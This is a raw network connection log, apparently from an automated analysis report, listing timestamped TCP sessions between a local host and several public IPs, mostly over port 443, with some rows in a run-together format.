Jan 6, 2025 23:05:03.889039993 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.889046907 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.890321970 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.890733004 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.890739918 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.894041061 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.896791935 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.896822929 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.897154093 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.897166014 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.899905920 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.899969101 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.899996996 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.900005102 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.901130915 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.903055906 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.906105042 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.906148911 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.909151077 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.909172058 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.909179926 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.909204960 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.914638996 CET    443          49768      142.250.186.97   192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.914679050 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.914907932 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.914910078 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.914921999 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.915718079 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.915724993 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.915767908 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.916207075 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.918277979 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.918318033 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.919102907 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.919110060 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.920284033 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.920312881 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.920320034 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.920483112 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.920512915 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.925196886 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.931457043 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.931467056 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.211208105 CET4434978618.244.18.32192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.265675068 CET49786443192.168.2.418.244.18.32
                                                                                                                                                            Jan 6, 2025 23:05:04.265691042 CET4434978618.244.18.32192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.266756058 CET4434978618.244.18.32192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.266767025 CET4434978618.244.18.32192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.266804934 CET49786443192.168.2.418.244.18.32
                                                                                                                                                            Jan 6, 2025 23:05:04.270905018 CET49786443192.168.2.418.244.18.32
                                                                                                                                                            Jan 6, 2025 23:05:04.270976067 CET4434978618.244.18.32192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.424316883 CET49786443192.168.2.418.244.18.32
                                                                                                                                                            Jan 6, 2025 23:05:04.424331903 CET4434978618.244.18.32192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.528913975 CET49786443192.168.2.418.244.18.32
                                                                                                                                                            Jan 6, 2025 23:05:04.814364910 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:04.814393044 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.814440966 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:04.814920902 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:04.814939022 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.815098047 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:04.815135002 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:04.815146923 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.815593004 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:04.815606117 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.910706997 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:04.910731077 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:04.910819054 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:04.911858082 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:04.911885023 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.289972067 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.290330887 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.290338993 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.291668892 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.291727066 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.292603016 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.292727947 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.293183088 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.293190002 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.293948889 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.294110060 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.294116974 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.295063972 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.295123100 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.297894001 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.297950983 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.298207045 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.298212051 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.357712030 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.379604101 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.388319969 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.388535023 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.388541937 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.390005112 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.390081882 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.391324997 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.391406059 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.391499043 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.391504049 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.416210890 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.416296005 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.416347980 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.416572094 CET49809443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.416577101 CET44349809162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.420370102 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.420422077 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.420490026 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.420615911 CET49808443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.420625925 CET44349808172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.514319897 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.530364037 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.530426979 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.530581951 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.530842066 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:05.530858994 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.882457018 CET49817443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.882483006 CET44349817162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.882556915 CET49817443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.882785082 CET49818443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.882822990 CET44349818162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.882952929 CET49817443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.882965088 CET44349817162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:05.882977962 CET49818443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.883096933 CET49818443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:05.883110046 CET44349818162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.346322060 CET44349818162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.350065947 CET49818443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:06.350083113 CET44349818162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.350405931 CET44349818162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.355420113 CET44349817162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.363735914 CET49818443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:06.363800049 CET44349818162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.363883018 CET49818443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:06.364044905 CET49817443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:06.364063025 CET44349817162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.364381075 CET44349817162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.364636898 CET49817443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:06.364705086 CET44349817162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.364742041 CET49817443192.168.2.4162.159.61.3
                                                                                                                                                            Jan 6, 2025 23:05:06.407332897 CET44349818162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.411320925 CET44349817162.159.61.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.446558952 CET49824443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.446594954 CET44349824172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.446656942 CET49824443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.447417974 CET49825443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.447447062 CET44349825172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.447500944 CET49825443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.454437017 CET49825443192.168.2.4172.64.41.3
                                                                                                                                                            Jan 6, 2025 23:05:06.454451084 CET44349825172.64.41.3192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:06.457472086 CET49824443192.168.2.4172.64.41.3
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Jan 6, 2025 23:05:06.457484961 CET  443          49824      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.487628937 CET  443          49818      162.159.61.3     192.168.2.4
Jan 6, 2025 23:05:06.487698078 CET  443          49818      162.159.61.3     192.168.2.4
Jan 6, 2025 23:05:06.488460064 CET  49818        443        192.168.2.4      162.159.61.3
Jan 6, 2025 23:05:06.488641977 CET  49818        443        192.168.2.4      162.159.61.3
Jan 6, 2025 23:05:06.488658905 CET  443          49818      162.159.61.3     192.168.2.4
Jan 6, 2025 23:05:06.497808933 CET  443          49817      162.159.61.3     192.168.2.4
Jan 6, 2025 23:05:06.498096943 CET  49817        443        192.168.2.4      162.159.61.3
Jan 6, 2025 23:05:06.498523951 CET  49817        443        192.168.2.4      162.159.61.3
Jan 6, 2025 23:05:06.498536110 CET  443          49817      162.159.61.3     192.168.2.4
Jan 6, 2025 23:05:06.910634995 CET  443          49824      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.910959959 CET  49824        443        192.168.2.4      172.64.41.3
Jan 6, 2025 23:05:06.910970926 CET  443          49824      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.911283970 CET  443          49824      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.912084103 CET  49824        443        192.168.2.4      172.64.41.3
Jan 6, 2025 23:05:06.912142038 CET  443          49824      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.941607952 CET  443          49825      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.941915989 CET  49825        443        192.168.2.4      172.64.41.3
Jan 6, 2025 23:05:06.941929102 CET  443          49825      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.942261934 CET  443          49825      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.942790031 CET  49825        443        192.168.2.4      172.64.41.3
Jan 6, 2025 23:05:06.942848921 CET  443          49825      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:06.991427898 CET  49824        443        192.168.2.4      172.64.41.3
Jan 6, 2025 23:05:07.147335052 CET  443          49825      172.64.41.3      192.168.2.4
Jan 6, 2025 23:05:07.147381067 CET  49825        443        192.168.2.4      172.64.41.3
Jan 6, 2025 23:05:07.762454033 CET  49786        443        192.168.2.4      18.244.18.32
Jan 6, 2025 23:05:07.804790974 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:07.804811954 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:07.804877996 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:07.805052042 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:07.805066109 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:07.807331085 CET  443          49786      18.244.18.32     192.168.2.4
Jan 6, 2025 23:05:07.949153900 CET  443          49786      18.244.18.32     192.168.2.4
Jan 6, 2025 23:05:07.949333906 CET  443          49786      18.244.18.32     192.168.2.4
Jan 6, 2025 23:05:07.949400902 CET  49786        443        192.168.2.4      18.244.18.32
Jan 6, 2025 23:05:08.018874884 CET  49786        443        192.168.2.4      18.244.18.32
Jan 6, 2025 23:05:08.018898964 CET  443          49786      18.244.18.32     192.168.2.4
Jan 6, 2025 23:05:08.179446936 CET  49849        443        192.168.2.4      108.139.47.50
Jan 6, 2025 23:05:08.179478884 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.179637909 CET  49849        443        192.168.2.4      108.139.47.50
Jan 6, 2025 23:05:08.179860115 CET  49849        443        192.168.2.4      108.139.47.50
Jan 6, 2025 23:05:08.179874897 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.386363029 CET  49856        443        192.168.2.4      20.110.205.119
Jan 6, 2025 23:05:08.386425972 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:08.386627913 CET  49856        443        192.168.2.4      20.110.205.119
Jan 6, 2025 23:05:08.386997938 CET  49856        443        192.168.2.4      20.110.205.119
Jan 6, 2025 23:05:08.387011051 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:08.605253935 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:08.605509043 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:08.605520010 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:08.606494904 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:08.606551886 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:08.607697964 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:08.607764006 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:08.607902050 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:08.607954025 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:08.607963085 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:08.655550003 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:08.766772985 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.767211914 CET  49849        443        192.168.2.4      108.139.47.50
Jan 6, 2025 23:05:08.767220974 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.767555952 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.769575119 CET  49849        443        192.168.2.4      108.139.47.50
Jan 6, 2025 23:05:08.769633055 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.769846916 CET  49849        443        192.168.2.4      108.139.47.50
Jan 6, 2025 23:05:08.811366081 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.899729967 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:08.899821043 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:08.900538921 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:08.917284012 CET  49847        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:08.917296886 CET  443          49847      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:08.929157972 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.929212093 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:08.929244995 CET  49849        443        192.168.2.4      108.139.47.50
Jan 6, 2025 23:05:09.016540051 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:09.182560921 CET  49856        443        192.168.2.4      20.110.205.119
Jan 6, 2025 23:05:09.182593107 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:09.183063984 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:09.187980890 CET  49856        443        192.168.2.4      20.110.205.119
Jan 6, 2025 23:05:09.188054085 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:09.188900948 CET  49856        443        192.168.2.4      20.110.205.119
Jan 6, 2025 23:05:09.210393906 CET  49849        443        192.168.2.4      108.139.47.50
Jan 6, 2025 23:05:09.210407972 CET  443          49849      108.139.47.50    192.168.2.4
Jan 6, 2025 23:05:09.235332966 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:09.342864037 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:09.343080044 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:09.343137026 CET  49856        443        192.168.2.4      20.110.205.119
Jan 6, 2025 23:05:09.345148087 CET  49856        443        192.168.2.4      20.110.205.119
Jan 6, 2025 23:05:09.345163107 CET  443          49856      20.110.205.119   192.168.2.4
Jan 6, 2025 23:05:09.365845919 CET  49871        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.365854979 CET  443          49871      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.366003990 CET  49871        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.366343975 CET  49871        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.366353035 CET  443          49871      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.366583109 CET  49872        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.366625071 CET  443          49872      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.366673946 CET  49872        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.367197990 CET  49872        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.367213011 CET  443          49872      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.367990017 CET  49873        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.367997885 CET  443          49873      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.368165016 CET  49873        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.368505955 CET  49874        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.368515968 CET  443          49874      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.368568897 CET  49874        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.368726969 CET  49873        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.368736029 CET  443          49873      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.368818045 CET  49874        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.368830919 CET  443          49874      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.662292004 CET  49878        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:09.662318945 CET  443          49878      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:09.662395954 CET  49878        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:09.662866116 CET  49878        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:09.662879944 CET  443          49878      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:09.674134016 CET  49879        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:09.674160004 CET  443          49879      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:09.674374104 CET  49879        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:09.674659014 CET  49879        443        192.168.2.4      20.189.173.4
Jan 6, 2025 23:05:09.674665928 CET  443          49879      20.189.173.4     192.168.2.4
Jan 6, 2025 23:05:09.819307089 CET  49723        80         192.168.2.4      199.232.214.172
Jan 6, 2025 23:05:09.819597960 CET  49724        80         192.168.2.4      199.232.214.172
Jan 6, 2025 23:05:09.820622921 CET  443          49872      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.820775032 CET  49872        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.820797920 CET  443          49872      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.821814060 CET  443          49872      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.821881056 CET  49872        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.822768927 CET  49872        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.822834015 CET  443          49872      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.823585987 CET  443          49871      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.823755980 CET  49871        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.823771000 CET  443          49871      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.824244976 CET  80           49723      199.232.214.172  192.168.2.4
Jan 6, 2025 23:05:09.824291945 CET  49723        80         192.168.2.4      199.232.214.172
Jan 6, 2025 23:05:09.824539900 CET  80           49724      199.232.214.172  192.168.2.4
Jan 6, 2025 23:05:09.824585915 CET  49724        80         192.168.2.4      199.232.214.172
Jan 6, 2025 23:05:09.824918032 CET  443          49871      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.824975967 CET  49871        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.825284958 CET  49871        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.825345039 CET  443          49871      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.944704056 CET  49872        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.944715977 CET  443          49872      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.944747925 CET  49871        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:09.944760084 CET  443          49871      23.57.90.149     192.168.2.4
Jan 6, 2025 23:05:09.955461025 CET  443          49873      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.962773085 CET  49873        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.962783098 CET  443          49873      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.963814974 CET  443          49873      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.963874102 CET  49873        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.965512037 CET  49873        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.965569973 CET  443          49873      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.976120949 CET  443          49874      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.976500034 CET  49874        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.976514101 CET  443          49874      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.977525949 CET  443          49874      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:09.977583885 CET  49874        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.977916002 CET  49874        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:09.977978945 CET  443          49874      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:10.035819054 CET  49873        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:10.035829067 CET  443          49873      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:10.035856009 CET  49874        443        192.168.2.4      204.79.197.219
Jan 6, 2025 23:05:10.035865068 CET  443          49874      204.79.197.219   192.168.2.4
Jan 6, 2025 23:05:10.051273108 CET  49872        443        192.168.2.4      23.57.90.149
Jan 6, 2025 23:05:10.051390886 CET  49871        443        192.168.2.4      23.57.90.149
                                                                                                                                                            Jan 6, 2025 23:05:10.232544899 CET49873443192.168.2.4204.79.197.219
                                                                                                                                                            Jan 6, 2025 23:05:10.232573032 CET49874443192.168.2.4204.79.197.219
                                                                                                                                                            Jan 6, 2025 23:05:10.289943933 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.289968014 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.290102005 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.290843964 CET49887443192.168.2.420.189.173.4
                                                                                                                                                            Jan 6, 2025 23:05:10.290854931 CET4434988720.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.450022936 CET4434987820.189.173.4192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:10.450561047 CET49878443192.168.2.420.189.173.4
